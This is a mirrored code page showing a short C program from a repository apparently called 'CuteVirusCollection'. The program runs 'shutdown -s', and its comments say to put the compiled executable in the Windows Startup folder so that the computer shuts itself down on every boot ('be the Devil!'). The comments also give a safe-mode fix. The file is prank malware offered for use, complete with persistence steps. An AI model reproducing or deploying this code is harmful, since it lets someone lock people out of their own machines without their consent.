mirror of
https://github.com/MinhasKamal/CuteVirusCollection.git
synced 2025-12-12 07:40:43 -08:00
14 lines
410 B
C
14 lines
410 B
C
// Simply shuts the system down.
|
|
// Put the compiled executable in the startup directory
|
|
// (%appdata%\Microsoft\Windows\Start Menu\Programs\Startup)
|
|
// of WindowsOS. And be the Devil!
|
|
// Caution: This will prevent you from turning the PC on. To
|
|
// solve, you can turn on the PC in safe mode and remove the
|
|
// executable from the startup directory.
|
|
|
|
#include <stdlib.h>
|
|
|
|
main(){
|
|
system("shutdown -s");
|
|
}
|